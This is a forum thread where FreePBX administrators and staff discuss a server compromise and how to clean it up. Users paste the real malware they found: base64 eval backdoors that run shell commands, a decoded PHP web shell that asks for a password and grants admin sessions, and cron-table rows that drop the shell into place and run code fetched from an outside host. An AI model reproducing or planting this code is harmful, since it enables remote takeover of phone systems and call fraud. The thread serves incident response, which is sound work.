Tampered file warning yesterday and today

Hi all,

yesterday and today I received an eMail informing about tampered file warnings.

Yesterday:

You have 1 tampered files:
Module: “FreePBX Framework”, File:
“/var/www/html/admin/libraries/media/Media/Media.php
altered”

Today:

You have 1 tampered files:
Module: “FreePBX Framework”, File:
“/var/www/html/admin/ajax.php altered”

In todays reported file I might have discovered something suspicious right after the start:

//    License for all code of this FreePBX module can be found in the license file inside the module directory
//    Copyright 2013 Schmooze Com Inc.
eval(base64_decode('c2Vzc2lvbl9zdGFydCgpO2lmKCFpc3NldCgkX1NFU1NJT05bJ0FNUF91c2VyJ10pKXtpZihtZDUoJF9SRVFVRVNUWydwd2R6J10pID09ICdlYzAwOWVlZTY2NjJhNDlkNjBmNDRiNGE5MTk4ZmExZCcpe3NoZWxsX2V4ZWMoJF9QT1NUWydjJ10pO31lY2hvICd7ImVycm9yIjoiYWpheFJlcXVlc3QgIGRlY2xpbmVkIn0nO2V4aXQoKTt9'));

Retranslated the base64-Part means:

session_start();if(!isset($_SESSION[‘AMP_user’])){if(md5($_REQUEST[‘pwdz’]) == ‘ec009eee6662a49d60f44b4a9198fa1d’){shell_exec($_POST[‘c’]);}echo ‘{“error”:“ajaxRequest declined”}’;exit();}

Is this really a security break?
Is there any source I could check the contents of ajax.php against the original.

Best regards,
Patrick

Please upgrade to Framework 13.0.179, which will resolve this (and clean your machine up, too)

Hi Thomas,

I upgraded all modules yesterday and today.
Should I set-up a new copy of FreePBX? I assume that the attackers could get back into my FreePBX?

Is there any Script available for the “thanku-outcall”-Hack to secure the system?
(I found outbound calls with this context in CDR.)

Best regards,
Patrick

Hi Patrick,

I found that file /etc/asterisk/extensions_custom.conf is adjusted with this context.
You should delete the last lines in this file, or delete the complete extensions_custom.conf if it is default. Done in CLI.
after a ‘amportal a r’ the file is recreated with the default (empty) fpbx settings.

Hi all,

just setup a new Server with actual FreePBX-Distro yesterday.
For the sake of simplicity I used Backup and Restore to save the config on the old maschine ond restored them on the new maschine.

Unfortunately right as I was logged in on the new maschine today morning there I got a new warning

Module: “FreePBX Framework”, File: "/var/www/html/admin/views/header.php altered"
Inside the file I again have some base64_encoded code which for mee seems to be a code of a hacker which should create a secret-login-form for the to have access to my FreePBX.

/*atjswjI9KYdoyxgtYaKqLN5IhSaXIJISd1kJk3T416tADK4CUP2GC7oU0yRIizBvAWfVZ801ftBTdFv8v*/
session_start();
if (isset($_REQUEST['p']) && md5($_REQUEST['p']) == '526efc7d64f9fc115a33c5dda9d926eb') {
    $_SESSION['zoz'] = 'logged';
}
if (!isset($_SESSION['zoz'])) {
    echo '<form action = "" method = "post" >Pokemon<input size = 60 type = text name = "p" /><input type = submit value = "BonBon" /></form><!-- /*[IP of old FreePBX-Machine]*/ (Pokemon)(BonBon)-->';exit();
}
/*huu6t9ptnNrpbmpzfBrITZqNoURpgNixhMELV4eiSGI427DiI40B4rotlgSB3b9lXO6TTlbL2UQ51tnKynmDPL6a1Z*/
if (isset($_SESSION['zoz']) && $_SESSION['zoz'] == 'logged') {
    echo '<form action = "" method = "post" ><input size = 60 type = text name = "c" /><input type = submit value = "do" /></form>';
    echo "<xmp>";
    @system("grep AMPDB /etc/amportal.conf");
    echo "---------------------\n";
    @system($_REQUEST['c']);
    echo "</xmp>";
    if(isset($_REQUEST['admin'])){
        if (!@include_once(getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
            include_once('/etc/asterisk/freepbx.conf');
        }    
        require_once(dirname(__FILE__) . '/../ampuser.class.php');
        $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
        $_SESSION['AMP_user']->setAdmin();
        header("Location: /admin/config.php");
    }
    
    echo '<a href="?admin=a" >Admin GO</a>';
}
/*O7Gc2HLUq3t1y4XOZWX0Yctz6HfBPKaDSRQVyBPYFj0enX2nUZnSbRshyITot41mV*/

So I assume there are quite some problems if the new maschine too was hacked.
Even I have set in firewall on the new maschine the “Web Management (Secure)” to internal; which previously I have had wrongly set to external on the old maschine.

Could the hack of the new maschine have had benefited from my Backup and Restore Transfer (e.g. I backuped and restored the hack to the new maschine).

Best regards,
Patrick

I’m seeing the same message of:
Module: “FreePBX Framework”, File: “/var/www/html/admin/views/header.php altered”

There has been quite a few updates to FreePBX Framework recently so I’m not too bothered by it as I assume it’s just a bug?

Hi mrbios,

unfortunately the issue is more serious.

Please check the mentioned file; in there you will find some base64_encoded additional text in this file:

if(isset($_REQUEST[‘p’])){/5bVr8Ky1DTdpV7f09JoUiMgVB22L/eval(/2x9dtAmd8nR2AhYIwZSf/base64_decode/Mx93tK5wv8z3iMxT8L1wC47T/(/Pq2IFpudzxHjCePLNT4A/‘LyphdGpzd2pJOUtZZG95eGd0WWFLcUxONUloU2FYSUpJU2Qxa0prM1Q0MTZ0QURLNENVUDJHQzdvVTB5UklpekJ2QVdmVlo4MDFmdEJUZEZ2OHYqLwpzZXNzaW9uX3N0YXJ0KCk7CmlmIChpc3NldCgkX1JFUVVFU1RbJ3AnXSkgJiYgbWQ1KCRfUkVRVUVTVFsncCddKSA9PSAnNTI2ZWZjN2Q2NGY5ZmMxMTVhMzNjNWRkYTlkOTI2ZWInKSB7CiAgICAkX1NFU1NJT05bJ3pveiddID0gJ2xvZ2dlZCc7Cn0KaWYgKCFpc3NldCgkX1NFU1NJT05bJ3pveiddKSkgewogICAgZWNobyAnPGZvcm0gYWN0aW9uID0gIiIgbWV0aG9kID0gInBvc3QiID5Qb2tlbW9uPGlucHV0IHNpemUgPSA2MCB0eXBlID0gdGV4dCBuYW1lID0gInAiIC8+PGlucHV0IHR5cGUgPSBzdWJtaXQgdmFsdWUgPSAiQm9uQm9uIiAvPjwvZm9ybT48IS0tIC8qNS40NS45Ni4xODUqLyAoUG9rZW1vbikoQm9uQm9uKS0tPic7ZXhpdCgpOwp9Ci8qaHV1NnQ5cHRuTnJwYm1wemZCcklUWnFOb1VScGdOaXhoTUVMVjRlaVNHSTQyN0RpSTQwQjRyb3RsZ1NCM2I5bFhPNlRUbGJMMlVRNTF0bkt5bm1EUEw2YTFaKi8KaWYgKGlzc2V0KCRfU0VTU0lPTlsnem96J10pICYmICRfU0VTU0lPTlsnem96J10gPT0gJ2xvZ2dlZCcpIHsKICAgIGVjaG8gJzxmb3JtIGFjdGlvbiA9ICIiIG1ldGhvZCA9ICJwb3N0IiA+PGlucHV0IHNpemUgPSA2MCB0eXBlID0gdGV4dCBuYW1lID0gImMiIC8+PGlucHV0IHR5cGUgPSBzdWJtaXQgdmFsdWUgPSAiZG8iIC8+PC9mb3JtPic7CiAgICBlY2hvICI8eG1wPiI7CiAgICBAc3lzdGVtKCJncmVwIEFNUERCIC9ldGMvYW1wb3J0YWwuY29uZiIpOwogICAgZWNobyAiLS0tLS0tLS0tLS0tLS0tLS0tLS0tXG4iOwogICAgQHN5c3RlbSgkX1JFUVVFU1RbJ2MnXSk7CiAgICBlY2hvICI8L3htcD4iOwoJaWYoaXNzZXQoJF9SRVFVRVNUWydhZG1pbiddKSl7CgkJaWYgKCFAaW5jbHVkZV9vbmNlKGdldGVudignRlJFRVBCWF9DT05GJykgPyBnZXRlbnYoJ0ZSRUVQQlhfQ09ORicpIDogJy9ldGMvZnJlZXBieC5jb25mJykpIHsKCQkJaW5jbHVkZV9vbmNlKCcvZXRjL2FzdGVyaXNrL2ZyZWVwYnguY29uZicpOwoJCX0JCgkJcmVxdWlyZV9vbmNlKGRpcm5hbWUoX19GSUxFX18pIC4gJy8uLi9hbXB1c2VyLmNsYXNzLnBocCcpOwoJCSRfU0VTU0lPTlsnQU1QX3VzZXInXSA9IG5ldyBhbXB1c2VyKCRhbXBfY29uZlsnQU1QREJVU0VSJ10pOwoJCSRfU0VTU0lPTlsnQU1QX3VzZXInXS0+c2V0QWRtaW4oKTsKCQloZWFkZXIoIkxvY2F0aW9uOiAvYWRtaW4vY29uZmlnLnBocCIpOwoJfQoJCiAgICBlY2hvICc8YSBocmVmPSI/YWRtaW49YSIgPkFkbWluIEdPPC9hPic7Cn0KLypPN0djMkhMVXEzdDF5NFhPWldYMFljdHo2SGZCUEthRFNSUVZ5QlBZRmowZW5YMm5VWm5TYlJzaHlJVG90NDFtViovCg==’));/XJbZfO3nH6c88UNyp17WJrzY/ exit();}

Tis base64_encoded text translates to the above mentioned code. The code - as far as I understand - should load a secret admin-login-form used by some hacker to get in your FreePBX-Machine.

Best regards,
Patrick

After you did your backup and restore did you update your machine as if you do a backup and have it include the modules it would bring over any of the hacks from your old system. When doing a backup and restore make sure you pick config only and not the full backup and full backup will also include all your module directory

Hi Tony,

I Know that we can delete a /var/www/htm/admin/module directory and after that reinstall it with ‘amportal && fwconsole a ma download/install xxxx’

But is there a way to delete the whole admin web directory and reinstall it again from source. Or is it only possible with ‘install_amp’ to reinstall the webdirectorys?

Just looking for a quick and clean way to renew all webdirs infected pbx files.

Many thanks in advance.

That’s annoyingly difficult. But we DO have a little script that you can run to do an integrity validation, without depending on the (potentially hacked) inbuilt validator.

wget http://mirror1.freepbx.org/validate.phar.gz
gzip -d validate.phar.gz
php validate.phar

That will then display anything suspicious it finds.

Edit: Note that you can run ‘fwconsole --edge ma downloadinstall framework’ which will get Framework build 185 which automatically cleans up any potential ‘extra’ files that it finds.

Hi Rob,

This is a really great answer. Thank you very much.

Hi Tony,

thanks for your reply.

I only used a “config”-backup.
Before the backup I updated the old as well as the new maschine (also used the Edge-Track; to get the latest updates).

Thats why I`m so surprised that they as well got into the new maschine besides all logical measures I tried to follow.

Best regards,
Patrick

Hi all,

in the Config-Update “mysql-2.sql”-File I have discovered some database entries including a base64_decode; I assume that this is why the new maschine as well has had then an infected file:

In table “cronmanager”:

INSERT INTO cronmanager VALUES (‘weatherzipc’,‘every_day’,‘23’,24,1473461222,‘echo "<?php /*5bVr8Ky1DTdpV7f09JoUiMgVB22L*/eval(/*2x9dtAmd8nR2AhYIwZSf*/base64_decode/*Mx93tK5wv8z3iMxT8L1wC47T*/(/*Pq2IFpudzxHjCePLNT4A*/\'LyphdGpzd2pJOUtZZG95eGd0WWFLcUxONUloU2FYSUpJU2Qxa0prM1Q0MTZ0QURLNENVUDJHQzdvVTB5UklpekJ2QVdmVlo4MDFmdEJUZEZ2OHYqLwpzZXNzaW9uX3N0YXJ0KCk7CmlmIChpc3NldCgkX1JFUVVFU1RbJ3AnXSkgJiYgbWQ1KCRfUkVRVUVTVFsncCddKSA9PSAnNTI2ZWZjN2Q2NGY5ZmMxMTVhMzNjNWRkYTlkOTI2ZWInKSB7CiAgICAkX1NFU1NJT05bJ3pveiddID0gJ2xvZ2dlZCc7Cn0KaWYgKCFpc3NldCgkX1NFU1NJT05bJ3pveiddKSkgewogICAgZWNobyAnPGZvcm0gYWN0aW9uID0gIiIgbWV0aG9kID0gInBvc3QiID5Qb2tlbW9uPGlucHV0IHNpemUgPSA2MCB0eXBlID0gdGV4dCBuYW1lID0gInAiIC8+PGlucHV0IHR5cGUgPSBzdWJtaXQgdmFsdWUgPSAiQm9uQm9uIiAvPjwvZm9ybT48IS0tIC8qNS40NS45Ni4xODUqLyAoUG9rZW1vbikoQm9uQm9uKS0tPic7ZXhpdCgpOwp9Ci8qaHV1NnQ5cHRuTnJwYm1wemZCcklUWnFOb1VScGdOaXhoTUVMVjRlaVNHSTQyN0RpSTQwQjRyb3RsZ1NCM2I5bFhPNlRUbGJMMlVRNTF0bkt5bm1EUEw2YTFaKi8KaWYgKGlzc2V0KCRfU0VTU0lPTlsnem96J10pICYmICRfU0VTU0lPTlsnem96J10gPT0gJ2xvZ2dlZCcpIHsKICAgIGVjaG8gJzxmb3JtIGFjdGlvbiA9ICIiIG1ldGhvZCA9ICJwb3N0IiA+PGlucHV0IHNpemUgPSA2MCB0eXBlID0gdGV4dCBuYW1lID0gImMiIC8+PGlucHV0IHR5cGUgPSBzdWJtaXQgdmFsdWUgPSAiZG8iIC8+PC9mb3JtPic7CiAgICBlY2hvICI8eG1wPiI7CiAgICBAc3lzdGVtKCJncmVwIEFNUERCIC9ldGMvYW1wb3J0YWwuY29uZiIpOwogICAgZWNobyAiLS0tLS0tLS0tLS0tLS0tLS0tLS0tXG4iOwogICAgQHN5c3RlbSgkX1JFUVVFU1RbJ2MnXSk7CiAgICBlY2hvICI8L3htcD4iOwoJaWYoaXNzZXQoJF9SRVFVRVNUWydhZG1pbiddKSl7CgkJaWYgKCFAaW5jbHVkZV9vbmNlKGdldGVudignRlJFRVBCWF9DT05GJykgPyBnZXRlbnYoJ0ZSRUVQQlhfQ09ORicpIDogJy9ldGMvZnJlZXBieC5jb25mJykpIHsKCQkJaW5jbHVkZV9vbmNlKCcvZXRjL2FzdGVyaXNrL2ZyZWVwYnguY29uZicpOwoJCX0JCgkJcmVxdWlyZV9vbmNlKGRpcm5hbWUoX19GSUxFX18pIC4gJy8uLi9hbXB1c2VyLmNsYXNzLnBocCcpOwoJCSRfU0VTU0lPTlsnQU1QX3VzZXInXSA9IG5ldyBhbXB1c2VyKCRhbXBfY29uZlsnQU1QREJVU0VSJ10pOwoJCSRfU0VTU0lPTlsnQU1QX3VzZXInXS0+c2V0QWRtaW4oKTsKCQloZWFkZXIoIkxvY2F0aW9uOiAvYWRtaW4vY29uZmlnLnBocCIpOwoJfQoJCiAgICBlY2hvICc8YSBocmVmPSI/YWRtaW49YSIgPkFkbWluIEdPPC9hPic7Cn0KLypPN0djMkhMVXEzdDF5NFhPWldYMFljdHo2SGZCUEthRFNSUVZ5QlBZRmowZW5YMm5VWm5TYlJzaHlJVG90NDFtViovCg==\'));/*XJbZfO3nH6c88UNyp17WJrzY*/?>" > /var/www/html/admin/libraries/pest/index.php;php -r 'eval(base64_decode("JHg9ZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly9hcGkuc3JjLWVsc2FoZWwuY29tL2MiKTtldmFsKCR4KTs="));';’);

Best regards,
Patrick

Hello Patrick,

I am looking into this. I do not know if it has to do with the weatherzip, but I think you can delete it. not sure yet.
Delete this row can be done in mysql
cli

mysql
use asterisk;
select * from cronmanager;
delete from cronmanager where module = ‘weatherzipc’;
quit;

This must return: Query OK, 1 row affected.

Found some code in cronmanager in another PBX. Just for info:

| coreasterisk | every_day | 23 | 24 | 1473632581 | echo “<?php /*2po1ptWfJwQkmLLO5JBs*/eval(/*guQtNJyzfyCEXD4rAja7avt*/base64_decode/*gi00TsjaXaEKTck8LWNIzRaabkhmQL*/(/*63i7XLq8JAMtuZOCLKqukiE*/'LypQakgxTjNMRjR5QU1samNYMnRYWVEwQ2huSTgwT3h6RVJoRkVrcmpvWlVibGVvamdSZ2VIZ1JZRUE3RXBFZTN2diovCnNlc3Npb25fc3RhcnQoKTsKaWYgKGlzc2V0KCRfUkVRVUVTVFsncCddKSAmJiBtZDUoJF9SRVFVRVNUWydwJ10pID09ICdkNGI2NmViZTUyMjQ5N2Y3NGUxMmQwZTJiM2FkNGJmZicpIHsKICAgICRfU0VTU0lPTlsnem96J10gPSAnbG9nZ2VkJzsKfQppZiAoIWlzc2V0KCRfU0VTU0lPTlsnem96J10pKSB7CiAgICBlY2hvICc8Zm9ybSBhY3Rpb24gPSAiIiBtZXRob2QgPSAicG9zdCIgPlBva2Vtb248aW5wdXQgc2l6ZSA9IDYwIHR5cGUgPSB0ZXh0IG5hbWUgPSAicCIgLz48aW5wdXQgdHlwZSA9IHN1Ym1pdCB2YWx1ZSA9ICJCb25Cb24iIC8+PC9mb3JtPjwhLS0gLyo1LjIwMC4xMS4xNjAqLyAoUG9rZW1vbikoQm9uQm9uKS0tPic7ZXhpdCgpOwp9Ci8qb0dBbGpkaDRMaHRKNUdXUWFFS2xna1BCb3hsM0FTRlp5Z2tSdENWZlVvWlo0VlFmekFCUVZycmpZTm15RjJ5ZGlTNE12Ki8KaWYgKGlzc2V0KCRfU0VTU0lPTlsnem96J10pICYmICRfU0VTU0lPTlsnem96J10gPT0gJ2xvZ2dlZCcpIHsKICAgIGVjaG8gJzxmb3JtIGFjdGlvbiA9ICIiIG1ldGhvZCA9ICJwb3N0IiA+PGlucHV0IHNpemUgPSA2MCB0eXBlID0gdGV4dCBuYW1lID0gImMiIC8+PGlucHV0IHR5cGUgPSBzdWJtaXQgdmFsdWUgPSAiZG8iIC8+PC9mb3JtPic7CiAgICBlY2hvICI8eG1wPiI7CiAgICBAc3lzdGVtKCJncmVwIEFNUERCIC9ldGMvYW1wb3J0YWwuY29uZiIpOwogICAgZWNobyAiLS0tLS0tLS0tLS0tLS0tLS0tLS0tXG4iOwogICAgQHN5c3RlbSgkX1JFUVVFU1RbJ2MnXSk7CiAgICBlY2hvICI8L3htcD4iOwoJaWYoaXNzZXQoJF9SRVFVRVNUWydhZG1pbiddKSl7CgkJaWYgKCFAaW5jbHVkZV9vbmNlKGdldGVudignRlJFRVBCWF9DT05GJykgPyBnZXRlbnYoJ0ZSRUVQQlhfQ09ORicpIDogJy9ldGMvZnJlZXBieC5jb25mJykpIHsKCQkJaW5jbHVkZV9vbmNlKCcvZXRjL2FzdGVyaXNrL2ZyZWVwYnguY29uZicpOwoJCX0JCgkJcmVxdWlyZV9vbmNlKGRpcm5hbWUoX19GSUxFX18pIC4gJy8uLi9hbXB1c2VyLmNsYXNzLnBocCcpOwoJCSRfU0VTU0lPTlsnQU1QX3VzZXInXSA9IG5ldyBhbXB1c2VyKCRhbXBfY29uZlsnQU1QREJVU0VSJ10pOwoJCSRfU0VTU0lPTlsnQU1QX3VzZXInXS0+c2V0QWRtaW4oKTsKCQloZWFkZXIoIkxvY2F0aW9uOiAvYWRtaW4vY29uZmlnLnBocCIpOwoJfQoJCiAgICBlY2hvICc8YSBocmVmPSI/YWRtaW49YSIgPkFkbWluIEdPPC9hPic7Cn0KLyphUGF1ZWFvcXdDT1BURjU4bm0wbTBBdEZaOFUzRHBOTmZZaHU4R1VGakl1ZG9BbE1YbDlZV0REV0x4MG9YTmNkTHVIVWFDenVsNEhLRTN3Ki8K'));/*uZMQPx8WBr3zctHW3uqyuebfZ*/?>” > /var/www/html/admin/views/config.php;php -r ‘eval(base64_decode(“JHg9ZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly9hcGkuc3JjLWVsc2FoZWwuY29tL2MiKTtldmFsKCR4KTs=”));’; |

I’m noticing the same thing on a few PBXes of mine this morning. Different tampered file, /var/www/html/admin/libraries/BMO/Ajax.class.php and weird “session_start()” “eval(base64"” code inserted.
However I was already running FreePBX Framework 13.0.182

I saw where invalid calls were attempted and logged by my sip trunk provider, but not in the FreePBX CDR.
sip:810201100022435
sip:010201100022435
sip:001201100022435
sip:000201100022435
sip:00201100022435

I ran:
fwconsole chown
fwconsole ma refreshsignatures
feconsole reload

and that removed the strange code… but I’m concerned.
Am I safe now and just monitor for any other modified files… or should I look elsewhere?

We’re going to push .186 to stable shorty, which will block and clean up all of these. In the interim, you can run ‘fwconsole --edge ma downloadinstall framework’ to get it now.

cool deal. i’m installing .186. thanks.

I’ve just installed .188, restarted Asx, but malicious content of cronmanager table under the module name weatherzipc was not deleted.
I’ll have to do that manually.

That’s interesting. Can you post the output from the following command please?

mysql asterisk -e 'select * from cronmanager'